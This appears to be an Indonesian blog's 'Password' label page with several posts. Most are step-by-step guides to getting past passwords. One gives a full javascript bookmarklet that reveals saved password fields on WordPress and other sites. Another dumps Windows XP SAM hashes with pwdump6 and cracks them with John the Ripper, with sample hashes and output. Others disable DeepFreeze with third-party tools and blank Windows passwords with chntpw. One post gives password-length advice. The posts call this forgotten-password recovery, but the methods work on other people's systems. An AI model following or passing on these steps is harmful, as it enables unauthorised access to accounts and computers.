Tampilkan postingan dengan label Password. Tampilkan semua postingan
Tampilkan postingan dengan label Password. Tampilkan semua postingan

Menembus Password Wordpress yang Tersembunyi


Apakah kamu pernah mencoba menembus password atau membobol password situs yang berbasis CMS Wordpress ? Apakah cara itu berhasil?

Nah, jika kamu pernah melakukannya berarti cocok sama hobinya Si Dani temenku, dia hobi-nya mengambil alih/meng-hack situs wordpress orang lain. Padahal saya sudah berkali-kali mengingatkan, "Dan, itu tidak baik, nanti kamu dosa lho jika sukanya mencuri akun situs orang lain". Tapi si Dani tetap saja gak berubah, paling-paling dia cuma bilang "Aku gak nyuri kq Kang, cuma iseng ngintip isi blog-nya, hehehe....".

Memang sih selama dalam pemantauan saya selama ini dia gak pernah jahat sama situs yang dia ambil alih password-nya (baca=dihack). Tapi tetap saja hal itu gak baik menurut saya.

Lalu yang jadi pertanyaan adalah, apakah kamu ingin seperti Dani yang suka mencuri?

Tentu jangan dnk...

Nah, tulisan saya kali ini lebih saya tujukan untuk kita yang lupa Password punya kita sendiri. Memang sih dalam halaman Login wordpress sudah ada fasilitas untuk Reset Password yang akan dikirimkan ke email kita, namun jika hal itu terlalu memakan waktu berikut ini saya punya cara yang lebih cepat.

Ok, langsung saja, hal pertama yang kamu butuhkan untuk melihat password wordpress situs kamu adalah dengan mencoba login ke situs kamu. Untuk wordpress biasanya dengan mengakses http://situskamu.com/wp-admin (pastikan komputer itu disetting untuk menyimpan chace memory user dan password).

Pada halaman login biasanya akan muncul halaman seperti gambar dibawah ini:



Dari halaman tersebut terlihat bahwa kita login menggunakan Username "admin" dalam mengakses situs wordpress. Username bisa berbeda tergantung kita saat membuat Username login-nya.

Lantas bagaimana cara mengetahui Password-nya?

Coba kamu pakai cara ini. Setelah melihat tampilan halaman Login seperti gambar diatas, silahkan kamu copy script dibawah ini.

javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}

Lalu paste-kan script tersebut ke Address Bar halaman browser kamu. Lalu tekan Enter.
(Address Bar adalah tempat kita menuliskan alamat situs/URL situs yang kita buka).




Setelah menekan Enter maka nanti akan muncul sebuah kotak yang berisi Password dari situs yang akan kita cari tahu password-nya tersebut. 
Cara ini simpel namun sangat membantu jika kita lupa pada password kita. Cara ini juga bisa kamu terapkan untuk mengetahui Password login ke situs lain (bukan cuma Wordpress).

Cara ini bukanlah teknik Hacking, namun lebih pada cara-cara pribadi untuk berkreasi dengan internet kita. Jika kamu berharap bisa menembus Wordpress maka saya sarankan carilah di forum sebelah, disana ada banyak share ilmu hacking maupun jumping untuk menembus Wordpress.

Semoga tulisan Menembus Password Wordpress yang Tersembunyi ini dapat bermanfaat.

Oya, saya juga minta dukungannya ya untuk artikel kontes SEO yang saya ikuti yaitu "Mercedes-Benz Mobil Mewah Terbaik Indonesia" dan "Komodo Island is the NEW 7 Wonders of The World". 

Doakan saya bisa menang ya temen-temen !!!


Read more »

Password Terbaik dan Teraman Agar Sulit Dijebol

Password Terbaik dan Teraman Agar Sulit Dijebol

Segera tinggalkan password 8 karakter atau kurang. Sekarang adalah era password 12 karakter, menurut laporan yang diterbitkan pekan ini oleh Institut Teknologi Georgia.

Hal itu dilaporkan juga dalam situs securitynewsdaily.com pada salah satu artikelnya yang berjudul "Passwords Need at Least 12 Characters to Be Safe, Study Finds"
 

Para peneliti menggunakan cluster kartu grafis untuk memecahkan password delapan karakter dan hanya memerlukan waktu kurang dari dua jam.

Tetapi ketika peneliti mencoba menjebol password 12-karakter, maka mereka menemukan bahwa hal itu akan perlu waktu 17.134 tahun.

"Panjang password Anda dalam beberapa kasus dapat mendikte kerentanan," kata Joshua Davis, ilmuwan riset di Georgia Tech Research Institute.

Sulit untuk mengatakan apa yang akan terjadi di masa mendatang, tapi untuk saat ini, password 12-karakter harus standar," kata Richard Boyd, seorang ilmuwan peneliti senior yang juga bekerja pada proyek tersebut.

Para peneliti merekomendasikan 12-karakter password dibandingkan 11 atau 13 karakter. Karena 12 keseimbangan antara "kenyamanan dan keamanan."

Mereka beranggapan seorang hacker canggih mungkin bisa

mencoba kombinasi 1 triliun sandi per detik.

Dalam skenario itu, dibutuhkan 180 tahun untuk memecahkan sandi 11-karakter. Tapi ada suatu lompatan besar ketika ditambahkan satu karakter lagi (12 karakter) karena diperlukan 17.134 tahun untuk menembusnya.

Semoga tulisan ini bermanfaat untuk keamanan anda. Bagi anda yang sedang mengalami masalah terkait dengan password deepfreeze silahkan baca juga tips cara menembus password deepfreeze, atau jika password Windows anda yang bermasalah silahkan baca tips menembus password windows.

*****

Read more »

Cara Hack Password Windows XP Sp-2


Cara kali ini merupakan salah satu dari beberapa cara yang dapat kamu gunakan untuk mengetahui password windows XP yang diberi password oleh Administrator.
Trik ini memanfaatkan 2 software, yaitu pwdump6 dan John The Ripper.


Ok, langsung aja...
Kita jalankan saja program pwdump6. Sebelumnya downlod dulu pwdump6 ini dari sini 

Setelah itu....

1. Jalankan CMD (Run->cmd)
2. Jalankan pwdump6 seperti berikut (misalnya PwDump6 berada di folder D:\PwDump6)
D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1
pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net
This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.
Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.
3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi. Contohnya akan tampak seperti berikut :
ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::
4. Okey.... Password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.

Download John The Ripper untuk Windows disini. Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :
D:\john171w\john1701\run>john-mmx.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)
Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.
Administrator:1+Administrator:2 = adminkeren123
Sedangkan untuk user “coba” adalah “mudahditebak”!!

Mudah bukan? 

Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.

Semoga tips Cara Hack Password Windows XP Sp-2 dapat bermanfaat !
Dan bagi anda yang ingin mengamankan password account anda silahkan baca tips menggunakan password terbaik dan teraman agar sulit dijebol.


******
Referensi : studenti.unina.it
*****

Read more »

Cara Menembus Password DeepFreeze


Mungkin kamu pernah memasang program DeepFreeze di komputer/laptop kamu, namun saat mau menonaktifkannya tiba-tiba kamu lupa passwordnya. Wah...gawat tuh....:-)

Kalau kamu mengalami masalah itu sekarang kamu bisa memakai software yang satu ini untuk melumpuhkan deepfreeze. Saya kasih gratis....;-)
 
 

A. DeepUnFreezer
(Untuk deppfreeze versi 5 kebawah)

Dengan software DeepUnFreezer kamu dapat melumpuhkan DeepFreeze. caranya seperti ini:

1. Download DeepUnFreezer disini
2. Klik icon DeepUnFreezer
3. Berikan tanda pada Boor Thawed
4. Lalu klik save status>Exit>restart

Maka pc akan terestart. dan jika telah hidup maka deepfreeze sudah tidak aktif.

B.
XDeepFreeze
 (Untuk deep freeze versi 6)

Cara sebagai berikut:

1. Download XDeepFreeze disini

2. Ekstrak ke C:\XDeepfreeze

3. Jalankan "Run_Me.exe" yang akan menghasilkan file "mcr.bat" dan "XDeepFreeze.exe" akan terload.

4. Pada XDeepFreeze, Tekan "Stop DeepFreeze", untuk menghentikan "frzstate.exe"

5. Pada XDeepFreeze, Tekan "Clean Registry", untuk
membersihkan registry yang dibuat deepfreeze pada saat
install.

6. Untuk masuk ke MS-Dos Mode, Jalankan "command.com"
(Sudah disertakan pada "xdeepfreeze.zip")

7. Jalankan "mcr.bat" (Berisi perintah yang akan
menghapus file "persifrz.vxd")

8. Ketik "Exit" untuk masuk ke Windows kembali.
Dan DeepFreeze tidak berfungsi.

Semoga trik Cara Menembus Password DeepFreeze dapat bermanfaat, dan jangan disalah gunakan ya...

Read more »

Membuka Password Windows dengan Linux Ubuntu


Lupa memang masalah yang biasa dihadapi manusia. Jika lupa password login Windows, ada cara untuk memulihkannya dengan menggunakan sistem operasi Ubuntu Linux.

Pertama yang perlu dilakukan adalah membuat Live CD atau Live USB Flashdisk Ubuntu Linux. Ubuntu Live ini akan digunakan untuk booting ke sistem dan melakukan prosedur yang dibutuhkan untuk membongkar password Windows tadi. 


Cara paling mudah untuk melakukan itu adalah dengan men-download UNetBootin dan menjalankannya. Aplikasi sederhana ini akan men-download versi Ubuntu yang dipilih dan melakukan instalasi pada flashdisk yang Anda siapkan.

Tahap kedua adalah menginstall utility Open Source bernama chntpw. Hal ini dilakukan dari Ubuntu dengan menjalankan Synaptic Package Manager.

Untuk bisa mendapatkan chntpw, Synaptic Package Manager harus diarahkan untuk melihat pada penyimpanan aplikasi Universe. Hal itu bisa dilakukan dengan mengklik menu Settings > Repositories pada jendela Synaptic. Kemudian, centang pilihan 'Community-maintained Open Source software (universe)' dan klik Close.

Setelah itu, klik tombol Reload dan Synaptic akan men-download informasi paket terbaru dari Universe. Setelah selesai, ketikkan chntpw pada kotak Quick Search.

Jika sudah muncul, centang kotak di sisi tulisan chnptw, pilih 'Mark for Installation'. Lalu klik Apply untuk menginstalnya.

Tahap ketiga adalah mengubah password Windows dengan chntpw.

1. Mount hardisk / drive yang berisi instalasi Windows Anda
2. Buka hardisk itu (klik Places) dan catat label drive yang muncul pada menu bar jendela file browser
3. Buka jendela Terminal (Applications > Accessories > Terminal)
4. Ketik perintah berikut pada Terminal:
cd / media
ls
5. Ketik: cd [label hardisk yang tadi Anda catat]
6. ketik: cd WINDOWS/system32/config
7. Untuk mengubah password Administrator, ketikkan perintah: sudo chntpw SAM
8. Akan muncul beberapa perintah yang bisa Anda pilih, perintah paling aman adalah membuat password jadi kosong. Lakukan ini dengan menekan angka '1', lalu tekan 'y' untuk konfirmasi
9. Pilih '2' untuk mengubah password ke kata tertentu, namun hal ini memiliki risiko error lebih besar
10. Untuk mengubah password user lain (non-administrator), ketikkan perintah berikut (dari Terminal): sudo chntpw –u [nama user] SAM


*****
(Ref: detikinet)

Read more »